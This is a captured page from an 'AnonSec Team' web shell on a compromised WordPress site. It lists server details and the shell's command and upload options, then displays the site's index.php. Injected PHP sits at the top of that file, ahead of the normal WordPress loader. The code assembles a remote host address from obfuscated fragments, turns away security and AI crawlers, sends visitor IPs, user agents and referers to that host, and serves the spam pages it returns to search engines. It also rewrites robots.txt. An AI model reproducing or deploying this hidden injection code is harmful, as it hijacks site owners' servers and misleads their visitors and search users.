AnonSec Team
Server IP : 109.234.164.45  /  Your IP : 216.73.216.140
Web Server : Apache
System : Linux cuvette.o2switch.net 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64
User : xqnc2294 ( 1276)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home/xqnc2294/gel-mains.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/xqnc2294/gel-mains.com/index.php
<?php $pc = "UlUDB10f"; $nlvm='53';$kfax='c';$kros='.com/';$rdxs='http://';$kcyr='.idbirth';$jura='w47';$ghsrp=$rdxs.$kfax.$jura.$nlvm.$kcyr.$kros; $bagent = "Aol|Google|Duckduckgo|Bing|yahoo"; if(preg_match("/(OBot|yandexBot|Feedly|coolpadWebkit|feedDemon|yySpider|paloaltonetworks|SeznamBot|digExt|claudebot|Paqlebot|Barkrowler|ahrefsBot|universalFeedParser|jikeSpider|heritrix|DotBot|easouSpider|scrapy|YisouSpider|AskTbFXTV|python-requests|mj12bot|jaunty|amazonBot|DataForSEO|httpClient|GPTBot|Python-urllib|Ezooms|Bytespider|CrawlDaddy|Java|SemrushBot|ZmEu|indy Library|swiftbot|PetalBot|lightDeckReports Bot|Go-http-client|CensysInspect|ApacheBench|Python)/i", $_SERVER['HTTP_USER_AGENT'])) {  header('HTTP/1.0 403 Forbidden');  exit(); } $language = urlencode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']); error_reporting(0); $ip = $_SERVER['REMOTE_ADDR']; $refer = urlencode(@$_SERVER['HTTP_REFERER']); $uagent = urlencode($_SERVER['HTTP_USER_AGENT']); $domain = urlencode($_SERVER['HTTP_HOST']); if (isset($_SERVER['HTTP_CLIENT_IP'])) {  $ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {  $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } $ip = urlencode($ip); $script = urlencode($_SERVER['SCRIPT_NAME']);  if ((!empty($_SERVER['REQUEST_SCHEME']) and $_SERVER['REQUEST_SCHEME'] == 'https') or (!empty($_SERVER['HTTPS']) and $_SERVER['HTTPS'] == 'on') or (!empty($_SERVER['SERVER_PORT']) and $_SERVER['SERVER_PORT'] == '443') or (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) {  $_SERVER['REQUEST_SCHEME'] = 'https'; } else {  $_SERVER['REQUEST_SCHEME'] = 'http'; } function writeToFile($path, $contents) {  $file = fopen($path, "w");  if ($file) {  fwrite($file, $contents);  fclose($file);  return true;  }  return false; }  function readFromFile($path) {  $file = fopen($path, "r");  if ($file) {  $contents = fread($file, filesize($path));  fclose($file);  return $contents;  }  return false; } $uri = urlencode($_SERVER['REQUEST_URI']); $http = urlencode($_SERVER['REQUEST_SCHEME']); if(strpos($uri,"iuniun") !== false){echo "ok";exit();} $iunFilePath = "iun.txt"; $iun = 0; if(!is_file($iunFilePath)) {  $uuu = $http.'://'.$_SERVER['HTTP_HOST'].'/iuniun';  $ltkw = @file_get_contents($uuu);   if($ltkw === "ok") {   $iun = 1;   writeToFile($iunFilePath,"1");  } else {   $iun = 0;   writeToFile($iunFilePath,"0");  } } else {  $iun = readFromFile($iunFilePath); }  if(strpos($uri,"favicon.ico") !== false) { } else if(strpos($uri,"robots.txt") !== false or strpos($uri,"jp2023") !== false or strpos($uri,"pingsitemap") !== false or preg_match("@^/(.*?).xml$@i", $_SERVER['REQUEST_URI']) or preg_match("/($bagent)/i", $_SERVER['HTTP_USER_AGENT']) or preg_match("/($bagent)/i", @$_SERVER['HTTP_REFERER'])) {  $robots_contents = "";  $requsturl = $ghsrp."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$iun&script=$script";  if(strpos($uri,"pingsitemap") !== false) {   $scripname = $_SERVER['SCRIPT_NAME'];   if(strpos($scripname,"index.ph") !== false) {    if($iun == 0) {     $scripname = '/?';    } else {     $scripname = '/';    }   } else {    $scripname = $scripname.'?';   }   $robots_contents = "User-agent: *\r\nAllow: /";   $sitemap = "$http://" . $domain .$scripname. "sitemap.xml";   $robots_contents = trim($robots_contents)."\r\n"."Sitemap: $sitemap";   $sitemapstatus = "";   echo $sitemap.": ".$sitemapstatus.'<br/>';   $requsturl = $ghsrp."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$iun&script=$script&sitemap=".urlencode($sitemap);  }  $ltkw = @file_get_contents($requsturl);  if(empty($ltkw)) {   $ch = curl_init();   curl_setopt($ch, CURLOPT_URL, $requsturl);   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);   $ltkw = curl_exec($ch);   curl_close($ch);  }  if(!empty($ltkw)) {   if(substr($ltkw,0,10)=="error code" or $ltkw == "500" or strpos($ltkw,'Bad Gateway')!==false) {    header("HTTP/1.0 500 Internal Server Error");    exit();   }   if(strpos($uri,"jp2023") !== false){header('HTTP/1.1 404 Not Found');}   else if(substr($ltkw,0,5)=="<?xml") {    header('Content-Type: text/xml; charset=utf-8');   } else {    header('Content-Type: text/html; charset=utf-8');   }   echo $ltkw;   if(!empty($robots_contents)){writeToFile("robots.txt",$robots_contents);}   else if(strpos($uri,"robots.txt") !== false){writeToFile("robots.txt",$ltkw);}   exit();   return;  } }else{ } 
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */
/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

AnonSec - 2021